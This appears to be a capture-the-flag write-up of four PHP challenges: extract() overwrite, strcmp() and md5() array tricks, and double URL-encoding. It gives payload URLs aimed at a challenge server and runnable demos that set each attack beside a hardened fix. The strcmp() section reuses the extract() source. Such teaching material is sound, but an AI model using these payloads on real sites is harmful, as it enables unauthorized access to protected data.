#extract() variable overwrite

```php
<?php
$flag = 'xxx';                               // path of the flag file
extract($_GET);                              // every GET parameter becomes a local variable, overwriting $flag
if (isset($shiyan)) {
    $content = trim(file_get_contents($flag));
    if ($shiyan == $content) {               // loose comparison
        echo 'flag{xxx}';
    } else {
        echo 'Oh.no';
    }
}
?>
```

Method: GET
Requirement: $shiyan == $content
Solution: extract() imports the GET parameters into the current symbol table, so a GET parameter named flag replaces the $flag defined on the line above it. Send flag as an empty string: file_get_contents('') fails and returns false (PHP 5 and 7; PHP 8 throws a ValueError for an empty filename instead), trim(false) yields '', and an empty shiyan compares equal to it.
Payload: http://120.24.86.145:9009/1.php?flag=&shiyan=
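The overwrite and two fixes side by side, as an added example that is not the challenge's code. It runs from the CLI: the request is a constructed array handed in as $_GET would be, the flag file is a temporary file with a constructed secret, and the attack points flag at php://memory, which reads as an empty string on every PHP version (the page's empty flag= does the same on PHP 5/7 but is a ValueError on PHP 8). The function names are mine.

```php
<?php
// Added example, not the challenge's own code. Shows extract($_GET) letting the
// client replace $flag, then the same check written without extract().

function vulnerable_check(array $get, string $flag_file): string
{
    $flag = $flag_file;          // the script's idea of where the flag lives
    extract($get);               // a parameter named "flag" silently replaces $flag
    if (!isset($shiyan)) {
        return 'no input';
    }
    $content = trim((string) file_get_contents($flag));
    return ($shiyan == $content) ? 'flag{xxx}' : 'Oh.no';
}

function hardened_check(array $get, string $flag_file): string
{
    // No extract(): read the one parameter that is needed, and require a string.
    if (!isset($get['shiyan']) || !is_string($get['shiyan'])) {
        return 'no input';
    }
    $content = trim((string) file_get_contents($flag_file));
    // Strict, constant-time comparison instead of ==
    return hash_equals($content, $get['shiyan']) ? 'flag{xxx}' : 'Oh.no';
}

// Constructed flag file with a secret the client does not know.
$flag_file = tempnam(sys_get_temp_dir(), 'flag');
file_put_contents($flag_file, "s3cret-content\n");

$honest = ['shiyan' => 'guess'];                        // ?shiyan=guess
$attack = ['flag' => 'php://memory', 'shiyan' => ''];   // ?flag=php://memory&shiyan=

echo 'vulnerable, honest request: ', vulnerable_check($honest, $flag_file), PHP_EOL;
echo 'vulnerable, attack request: ', vulnerable_check($attack, $flag_file), PHP_EOL;
echo 'hardened,   attack request: ', hardened_check($attack, $flag_file), PHP_EOL;

unlink($flag_file);
```

The attack request clears vulnerable_check() because $flag now names an empty stream, while hardened_check() still compares against the real file. If extract() has to stay, extract($get, EXTR_SKIP) refuses to overwrite variables that already exist, which protects $flag here but not any variable assigned after the call.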

#strcmp() string comparison

```php
<?php
$flag = 'xxx';
extract($_GET);
if (isset($shiyan)) {
    $content = trim(file_get_contents($flag));
    if ($shiyan == $content) {
        echo 'flag{bugku-dmsj-p2sm3N}';
    } else {
        echo 'Oh.no';
    }
}
?>
```

Method: GET
Requirement: $shiyan == $content
Solution: the source pasted above is the extract() challenge from the previous section again; the payload below is the strcmp() trick this heading refers to. strcmp() expects two strings. Given an array it emits a warning and returns NULL in PHP 5.3 through 7.x, so a check that tests strcmp($_GET['a'], $flag) == 0 passes, because NULL == 0 under loose comparison. PHP 8 throws a TypeError for the array argument instead, and a strict === 0 test would also reject NULL.
Payload:
?a[]=1

#urldecode() double-encoding bypass

```php
<?php
if (eregi("hackerDJ", $_GET[id])) {       // case-insensitive blacklist on the once-decoded value
    echo "not allowed!";
    exit();
}
$_GET[id] = urldecode($_GET[id]);         // second decode
if ($_GET[id] == "hackerDJ") {
    echo "Access granted!";
    echo "flag";
}
?>
```

eregi() does a case-insensitive string match (removed in PHP 7; preg_match() with the i flag is the modern equivalent), so changing the case of hackerDJ will not get past it.
The final check is $_GET[id] == "hackerDJ", applied after the value has been decoded one more time.
The web server already URL-decodes the query string once before the script sees it, and the script calls urldecode() a second time, so the submitted value must be the double-URL-encoded form of hackerDJ. Encoding a single character is enough:
one encoding: %68ackerDJ
two encodings: %2568ackerDJ
After the server's decode the script sees %68ackerDJ, which eregi() does not match; after urldecode() it becomes hackerDJ and the comparison passes.
Payload: http://120.24.86.145:9009/10.php?id=%2568ackerDJ
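Both decoding steps in one runnable script, as an added example that is not the challenge's code. parse_str() stands in for the web server's single decode of the query string, preg_match() with the i flag replaces the removed eregi(), and the payload is built from the target string rather than typed by hand. The function names are mine.

```php
<?php
// Added example, not the challenge's own code: why %2568ackerDJ passes when
// hackerDJ, HACKERDJ and %68ackerDJ do not.

function challenge(string $raw_query): string
{
    parse_str($raw_query, $get);                 // decode #1: what the server does
    $id = $get['id'] ?? '';
    if (preg_match('/hackerDJ/i', $id)) {        // the eregi() blacklist, case-insensitive
        return 'not allowed!';
    }
    $id = urldecode($id);                        // decode #2: done by the script
    return ($id == 'hackerDJ') ? 'Access granted!' : 'denied';
}

// Double-encode the first byte only. rawurlencode() leaves letters alone,
// so the first level is written with sprintf; the second level encodes the '%'.
function double_encode_first_char(string $s): string
{
    $once = sprintf('%%%02X', ord($s[0])) . substr($s, 1);        // h -> %68
    return rawurlencode(substr($once, 0, 3)) . substr($once, 3);  // %68 -> %2568
}

$candidates = [
    'hackerDJ',                              // blocked: literal match
    'HACKERDJ',                              // blocked: eregi() ignores case
    '%68ackerDJ',                            // blocked: server decodes it before the check
    double_encode_first_char('hackerDJ'),    // %2568ackerDJ
];

foreach ($candidates as $value) {
    printf("%-14s -> %s\n", $value, challenge('id=' . $value));
}
```

Only the last candidate reaches the comparison as hackerDJ: it is %68ackerDJ when the blacklist runs and hackerDJ after the script's own urldecode(). Any filter that runs before a later decode step has the same gap, whichever character is encoded.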

#md5() function

```php
<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
    if ($_GET['username'] == $_GET['password'])
        print 'Your password can not be your username.';
    else if (md5($_GET['username']) === md5($_GET['password']))
        die('Flag: ' . $flag);
    else
        print 'Invalid password';
}
?>
```

username and password must differ under the loose == check, yet their md5() results must be identical under strict ===.
Send arrays instead of strings: [1] == [2] is false, so the first check is cleared, and md5() of an array emits a warning (hidden by error_reporting(0)) and returns NULL in PHP 5 and 7, so md5(...) === md5(...) becomes NULL === NULL, which is true. PHP 8 throws a TypeError for the non-string argument instead.
Payload: http://120.24.86.145:9009/18.php?username[]=1&password[]=2
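The array-argument trick behind both the strcmp() section and this md5() section, as one added example that is not the challenges' code. The strcmp() check assumes the shape strcmp($_GET['a'], $flag) == 0, which the page does not show. It is written for PHP 5.3 through 7.x, where the bad argument is a warning and the result is NULL; on PHP 8 the same calls throw TypeError, which the loose variants catch so the script still runs. Function names and the flag value are mine.

```php
<?php
// Added example, not the challenges' own code: strcmp() and md5() given an
// array instead of a string, with the loose check beside a strict rewrite.

function strcmp_loose($input, string $flag): bool
{
    try {
        $r = @strcmp($input, $flag);   // PHP 7: warning, returns NULL for an array
    } catch (\TypeError $e) {          // PHP 8: non-string argument is a TypeError
        return false;
    }
    return $r == 0;                    // NULL == 0 holds under loose comparison
}

function strcmp_strict($input, string $flag): bool
{
    // Require a string, then compare the integer result strictly.
    return is_string($input) && strcmp($input, $flag) === 0;
}

function md5_login($user, $pass): string
{
    if ($user == $pass) {                     // ['1'] == ['2'] is false
        return 'same';
    }
    try {
        $ok = @md5($user) === @md5($pass);    // PHP 7: NULL === NULL
    } catch (\TypeError $e) {                 // PHP 8
        $ok = false;
    }
    return $ok ? 'flag' : 'invalid';
}

function md5_login_strict($user, $pass): string
{
    if (!is_string($user) || !is_string($pass) || $user === $pass) {
        return 'invalid';
    }
    return hash_equals(md5($user), md5($pass)) ? 'flag' : 'invalid';
}

$flag = 'flag{example}';                          // constructed secret

// ?a[]=1 arrives as ['1']; ?username[]=1&password[]=2 as ['1'] and ['2'].
var_dump(strcmp_loose(['1'], $flag));
var_dump(strcmp_strict(['1'], $flag));
echo md5_login(['1'], ['2']), PHP_EOL;
echo md5_login_strict(['1'], ['2']), PHP_EOL;
```

On PHP 7 the two loose functions accept the array input and the two strict ones refuse it; on PHP 8 the loose functions hit the TypeError and report failure. The fix in both cases is the same: check is_string() on anything taken from $_GET before passing it to a string function, and never compare the result of such a function with ==.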